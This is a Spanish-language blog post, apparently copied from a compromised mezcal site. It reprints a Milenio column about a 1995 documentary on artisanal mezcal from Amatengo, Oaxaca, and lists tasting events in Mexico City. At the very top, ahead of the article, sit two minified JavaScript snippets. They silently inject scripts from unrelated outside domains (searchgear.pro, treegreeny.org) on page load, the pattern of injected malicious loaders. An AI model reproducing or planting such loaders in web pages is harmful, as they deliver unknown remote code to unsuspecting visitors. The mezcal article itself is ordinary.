;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 47. CineMezcal

47. CineMezcal


Para todo mal mezcal, par todo bien también, es la famosísima y popular frase que sirvió de título al video de Marco Antonio Díaz León, quien nos dice que “fue concebido para apoyar la difusión de un proyecto cooperativo de mezcal artesanal, promovido por Don Jorge Reyes Pacheco, quien lamentablemente falleció meses después de la grabación, realizada en febrero de 1995.”
Sobre el trabajo, Marco menciona que “contiene la narración del propio Don Jorge quien nos habla del arduo proceso de producción del mezcal artesanal, de la necesidad de apoyos a la producción par evitar que la gente siga migrando al norte y sobre los sufrimientos de lo productores por acceder a un mejor nivel de vida.”
Dos aspectos más nos son comunicados. Primero, que “las grabaciones fueron realizadas en Amatengo [Distrito de Ejutla], Oaxaca”; segundo, que el video está “dedicado a Don Jorge Reyes Pacheco y a los mezcaleros tradicionales”.
Cabe añadir que, aunque no nos extenderemos en el tema, San Agustín Amatengo fue una de las poblaciones mezcaleras más famosas de Ejutla y de Oaxaca por la calidad de sus Mezcales, por lo que este video es de extremo interés para todos los ejutecos, los oaxaqueños y los Mezcólatras. El video dura 21 minutos y es parte del Programa de comunicación audiovisual y multimedia del Grupo de Estudios Ambientales A.C. (www.gea-ac.org), asociación que distribuye este material y otros relacionados con el maíz, el agua, la agricultura tradicional y el medio ambiente.
Si además de disfrutar CineMezcal se desea compartir con los finados (la temporada así lo obliga) un sabroso Mezcal, éste puede adquirirse en el Tianguis Mezcólatra hoy sábado de 12 a 15 horas en Red Fly: Orizaba 145, col. Roma, DF.
Si se requiere saborear varios Mezcales en estos días de asueto, puede acudirse a las sesiones de la Logia de los Mezcólatras: 1) lunes 1º de noviembre, 20 horas, en Salón Pata Negra, ubicado en Tamaulipas 30, altos, Condesa, DF; o 2) martes 2 de noviembre, 20 horas, Red Fly.
http://impreso.milenio.com/node/8857010

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *